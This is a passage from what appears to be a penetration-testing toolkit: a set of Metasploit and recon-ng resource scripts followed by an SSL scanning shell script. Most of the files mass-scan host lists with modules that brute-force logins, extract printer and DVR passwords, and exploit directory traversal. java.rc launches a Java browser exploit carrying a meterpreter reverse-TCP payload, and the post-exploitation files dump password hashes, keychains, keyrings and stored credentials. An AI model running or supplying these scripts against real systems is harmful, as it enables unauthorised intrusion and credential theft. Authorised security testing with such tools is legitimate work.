 8 | use auxiliary/scanner/scada/digi_realport_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/7777-backdoor.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 7777
4 | 
5 | use auxiliary/scanner/backdoor/energizer_duo_detect
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/79-finger.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 79
4 | 
5 | use auxiliary/scanner/finger/finger_users
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/8000-canon.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 8000
4 | 
5 | use auxiliary/scanner/printer/canon_iradv_pwd_extract
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/8080-oracle.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 8080
 4 | 
 5 | use auxiliary/scanner/oracle/xdb_sid_brute
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/xdb_sid
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/8080-tomcat.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 8080
 4 | 
 5 | use auxiliary/scanner/http/tomcat_enum
 6 | run
 7 | 
 8 | use auxiliary/scanner/http/tomcat_mgr_login
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/8222-vmware.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 8222
4 | 
5 | use auxiliary/scanner/vmware/vmware_server_dir_trav
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/831-easycafe.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 831
4 | 
5 | use auxiliary/scanner/misc/easycafe_server_fileaccess
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/8400-adobe.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 8400
4 | 
5 | use auxiliary/scanner/http/adobe_xml_inject
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/8834-nessus.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 8834
4 | 
5 | use auxiliary/scanner/nessus/nessus_xmlrpc_ping
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/9000-sharp.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 9000
4 | 
5 | use auxiliary/scanner/misc/raysharp_dvr_passwords
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/902-vmware.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 902
4 | 
5 | use auxiliary/scanner/vmware/vmauthd_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/9084-vmware.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 9084
4 | 
5 | use auxiliary/scanner/vmware/vmware_update_manager_traversal
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/9100-printers.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 9100
 4 | 
 5 | use auxiliary/scanner/printer/printer_version_info
 6 | run
 7 | 
 8 | use auxiliary/scanner/printer/printer_delete_file
 9 | run
10 | 
11 | use auxiliary/scanner/printer/printer_download_file
12 | run
13 | 
14 | use auxiliary/scanner/printer/printer_upload_file
15 | run
16 | 
17 | use auxiliary/scanner/printer/printer_env_vars
18 | run
19 | 
20 | use auxiliary/scanner/printer/printer_list_dir
21 | run
22 | 
23 | use auxiliary/scanner/printer/printer_list_volumes
24 | run
25 | 
26 | use auxiliary/scanner/printer/printer_ready_message
27 | run
28 | 


--------------------------------------------------------------------------------
/resource/998-zenworks.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 998
4 | 
5 | use auxiliary/scanner/misc/zenworks_preboot_fileaccess
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/9999-telnet.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 9999
4 | 
5 | use auxiliary/scanner/telnet/lantronix_telnet_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/http.rc:
--------------------------------------------------------------------------------
 1 | setg DOMAIN
 2 | setg HTTPBL_APIKEY
 3 | setg PATH_SAVE /root
 4 | setg RANGE
 5 | setg RHOST
 6 | setg RHOSTS
 7 | setg SQLMAP_PATH /pentest/database/sqlmap
 8 | setg THREADS 255
 9 | setg VULNCSV
10 | 
11 | ipidseq                  # from ip
12 | 
13 | lotus_domino_hashes      # from lotus
14 | lotus_domino_login       # from lotus
15 | lotus_domino_version     # from lotus
16 | 


--------------------------------------------------------------------------------
/resource/java.rc:
--------------------------------------------------------------------------------
 1 | use exploit/multi/browser/java_jre17_jmxbean
 2 | set SRVPORT 443
 3 | set URIPATH /
 4 | set PAYLOAD java/meterpreter/reverse_tcp
 5 | set LHOST 
 6 | set LPORT 443
 7 | set AutoLoadStdapi false
 8 | set AutoVerifySession false
 9 | set AutoRunScript post/windows/manage/migrate
10 | exploit
11 | 


--------------------------------------------------------------------------------
/resource/listener.rc:
--------------------------------------------------------------------------------
 1 | use exploit/multi/handler
 2 | set PAYLOAD aaa
 3 | set LHOST bbb
 4 | set LPORT ccc
 5 | set ExitOnSession false
 6 | set AutoVerifySession false
 7 | set AutoSystemInfo false
 8 | set AutoLoadStdapi false
 9 | set AutoRunScript post/windows/manage/migrate
10 | exploit -j
11 | 


--------------------------------------------------------------------------------
/resource/post-linux.rc:
--------------------------------------------------------------------------------
 1 | run post/linux/gather/checkcontainer
 2 | run post/linux/gather/checkvm
 3 | run post/linux/gather/ecryptfs_creds
 4 | run post/linux/gather/enum_commands
 5 | run post/linux/gather/enum_configs
 6 | run post/linux/gather/enum_network
 7 | run post/linux/gather/enum_protections
 8 | run post/linux/gather/enum_psk
 9 | run post/linux/gather/enum_system
10 | run post/linux/gather/enum_users_history
11 | run post/linux/gather/enum_xchat
12 | run post/linux/gather/gnome_commander_creds
13 | run post/linux/gather/gnome_keyring_dump
14 | run post/linux/gather/hashdump
15 | run post/linux/gather/mount_cifs_creds
16 | run post/linux/gather/openvpn_credentials
17 | run post/linux/gather/phpmyadmin_credsteal
18 | run post/linux/gather/pptpd_chap_secrets
19 | run post/linux/gather/tor_hiddenservices
20 | 


--------------------------------------------------------------------------------
/resource/post-osx.rc:
--------------------------------------------------------------------------------
 1 | run post/osx/gather/apfs_encrypted_volume_passwd
 2 | run post/osx/gather/autologin_password
 3 | run post/osx/gather/enum_adium
 4 | run post/osx/gather/enum_airport
 5 | run post/osx/gather/enum_chicken_vnc_profile
 6 | run post/osx/gather/enum_colloquy
 7 | run post/osx/gather/enum_keychain
 8 | run post/osx/gather/enum_messages
 9 | run post/osx/gather/enum_osx
10 | run post/osx/gather/hashdump
11 | run post/osx/gather/password_prompt_spoof
12 | run post/osx/gather/safari_lastsession
13 | run post/osx/gather/vnc_password_osx
14 | 


--------------------------------------------------------------------------------
/resource/recon-ng-import-emails.rc:
--------------------------------------------------------------------------------
1 | modules load import/list
2 | options set FILENAME /tmp/tmp-emails
3 | options set TABLE contacts
4 | options set COLUMN email
5 | run
6 | 


--------------------------------------------------------------------------------
/resource/recon-ng-import-ips.rc:
--------------------------------------------------------------------------------
1 | modules load import/list
2 | options set FILENAME /tmp/tmp-ips
3 | options set TABLE hosts
4 | options set COLUMN ip_address
5 | run
6 | 


--------------------------------------------------------------------------------
/resource/recon-ng-import-names.rc:
--------------------------------------------------------------------------------
1 | modules load import/csv_file
2 | options set FILENAME /tmp/names.csv
3 | options set TABLE contacts
4 | options set COLUMN_SEPARATOR #
5 | options set CSV_FIRST_NAME first_name
6 | options set CSV_LAST_NAME last_name
7 | options set CSV_TITLE title
8 | run
9 | 


--------------------------------------------------------------------------------
/resource/recon-ng.rc:
--------------------------------------------------------------------------------
1 | modules load recon/companies-contacts/pen
2 | run
3 | modules load recon/domains-contacts/pen
4 | run
5 | modules load recon/domains-contacts/pgp_search
6 | run
7 | modules load recon/hosts-hosts/resolve
8 | run
9 | 


--------------------------------------------------------------------------------
/ssl.sh:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env bash
  2 | 
  3 | # by Lee Baird (@discoverscripts)
  4 | 
  5 | clear
  6 | f_banner
  7 | 
  8 | echo -e "${BLUE}Check for SSL certificate issues.${NC}"
  9 | echo
 10 | echo "List of IP:port."
 11 | echo
 12 | 
 13 | f_location
 14 | 
 15 | echo
 16 | echo "$MEDIUM"
 17 | echo
 18 | 
 19 | echo "Running sslyze."
 20 | sslyze --targets_in="$LOCATION" --resum --reneg --heartbleed --certinfo --sslv2 --sslv3 --openssl_ccs > tmp
 21 | # Remove the first 20 lines and cleanup
 22 | sed '1,20d' tmp | grep -Eiv '(=>|error:|error|is trusted|not supported|ok - supported|opensslerror|server rejected|timeout|unexpected error)' |
 23 | # Find FOO, if the next line is blank, delete both lines
 24 | awk '/Compression/ { Compression = 1; next }  Compression == 1 && /^$/ { Compression = 0; next }  { Compression = 0 }  { print }' |
 25 | awk '/Renegotiation/ { Renegotiation = 1; next }  Renegotiation == 1 && /^$/ { Renegotiation = 0; next }  { Renegotiation = 0 }  { print }' |
 26 | awk '/Resumption/ { Resumption = 1; next }  Resumption == 1 && /^$/ { Resumption = 0; next }  { Resumption = 0 }  { print }' |
 27 | awk '/SSLV2/ { SSLV2 = 1; next }  SSLV2 == 1 && /^$/ { SSLV2 = 0; next }  { SSLV2 = 0 }  { print }' |
 28 | awk '/SSLV3/ { SSLV3 = 1; next }  SSLV3 == 1 && /^$/ { SSLV3 = 0; next }  { SSLV3 = 0 }  { print }' |
 29 | awk '/Stapling/ { Stapling = 1; next }  Stapling == 1 && /^$/ { Stapling = 0; next }  { Stapling = 0 }  { print }' |
 30 | awk '/Unhandled/ { Unhandled = 1; next }  Unhandled == 1 && /^$/ { Unhandled = 0; next }  { Unhandled = 0 }  { print }' |
 31 | # Find a dash (-), if the next line is blank, delete it
 32 | awk -v n=-2 'NR==n+1 && !NF{next} /-/ {n=NR}1' |
 33 | # Remove double spacing
 34 | cat -s > "$HOME"/data/sslyze.txt
 35 | 
 36 | ###############################################################################################################################
 37 | 
 38 | echo "Running sslscan."
 39 | echo
 40 | 
 41 | START=$(date +%r\ %Z)
 42 | 
 43 | echo "$MEDIUM" >> tmp
 44 | echo >> tmp
 45 | 
 46 | NUMBER=$(wc -l "$LOCATION" | cut -d ' ' -f1)
 47 | N=0
 48 | 
 49 | while read -r LINE; do
 50 |     N=$((N+1))
 51 |     echo "$LINE" > ssl_"$LINE"
 52 |     echo -n "[$N/$NUMBER]  $LINE"
 53 |     sslscan --ipv4 --ssl2 --ssl3 --tlsall --no-colour --connect-timeout=30 "$LINE" > tmp_"$LINE"
 54 |     echo
 55 |     echo >> ssl_"$LINE"
 56 | 
 57 |     if [ -f tmp_"$LINE" ]; then
 58 |         ERROR=$(grep 'ERROR:' tmp_"$LINE")
 59 | 
 60 |         if [ ! "$ERROR" ]; then
 61 |             cat tmp_"$LINE" >> ssl_"$LINE"
 62 |             echo "$MEDIUM" >> ssl_"$LINE"
 63 |             echo >> ssl_"$LINE"
 64 |             cat ssl_"$LINE" >> tmp
 65 |         else
 66 |             echo -e "${RED}Could not open a connection.${NC}"
 67 |             echo "[*] Could not open a connection." >> ssl_"$LINE"
 68 |             echo >> ssl_"$LINE"
 69 |             echo "$MEDIUM" >> ssl_"$LINE"
 70 |             echo >> ssl_"$LINE"
 71 |             cat ssl_"$LINE" >> tmp
 72 |         fi
 73 |     else
 74 |         echo -e "${RED}No response.${NC}"
 75 |         echo "[*] No response." >> ssl_"$LINE"
 76 |         echo >> ssl_"$LINE"
 77 |         echo "$MEDIUM" >> ssl_"$LINE"
 78 |         echo >> ssl_"$LINE"
 79 |         cat ssl_"$LINE" >> tmp
 80 |     fi
 81 | done < "$LOCATION"
 82 | 
 83 | END=$(date +%r\ %Z)
 84 | 
 85 | echo "sslscan Report" > tmp2
 86 | date +%A" - "%B" "%d", "%Y >> tmp2
 87 | echo >> tmp2
 88 | echo "Start time   $START" >> tmp2
 89 | echo "Finish time  $END" >> tmp2
 90 | echo "Scanner IP   $MYIP" >> tmp2
 91 | 
 92 | mv tmp2 "$HOME"/data/sslscan.txt
 93 | 
 94 | grep -v 'info not available.' tmp >> "$HOME"/data/sslscan.txt
 95 | rm tmp* ssl_* 2>/dev/null
 96 | 
 97 | ###############################################################################################################################
 98 | 
 99 | echo
100 | echo "Running nmap."
101 | echo
102 | 
103 | NUMBER=$(wc -l "$LOCATION" | cut -d ' ' -f1)
104 | N=0
105 | 
106 | while read -r LINE; do
107 |     N=$((N+1))
108 |     PORT=$(echo "$LINE" | cut -d ':' -f2)
109 |     TARGET=$(echo "$LINE" | cut -d ':' -f1)
110 | 
111 |     echo -n "[$N/$NUMBER]  $LINE"
112 |     # shellcheck disable=SC2024
113 |     sudo nmap -Pn -n -T4 --open -p "$PORT" -sV --script=rsa-vuln-roca,ssl*,tls-alpn,tls-ticketbleed --script-timeout 20s "$TARGET" > tmp
114 |     echo
115 | 
116 |     grep -Eiv '(does not|incorrect results|service unrecognized)' tmp | grep -v '^SF' |
117 |     # Find FOO, if the next line is blank, delete both lines
118 |     awk '/latency/ { latency = 1; next }  latency == 1 && /^$/ { latency = 0; next }  { latency = 0 }  { print }' |
119 |     sed 's/Nmap scan report for //g; s/( https:\/\/nmap.org ) //g' >> tmp2
120 |     echo "$MEDIUM" >> tmp2
121 |     echo >> tmp2
122 | done < "$LOCATION"
123 | 
124 | mv tmp2 "$HOME"/data/nmap-ssl.txt
125 | rm tmp
126 | 
127 | echo
128 | echo "$MEDIUM"
129 | echo
130 | echo "[*] Scan complete."
131 | echo
132 | echo
133 | echo -e "The new reports are located at ${YELLOW}$HOME/data/sslscan.txt ${NC}and ${YELLOW}nmap-ssl.txt ${NC}"
134 | 


--------------------------------------------------------------------------------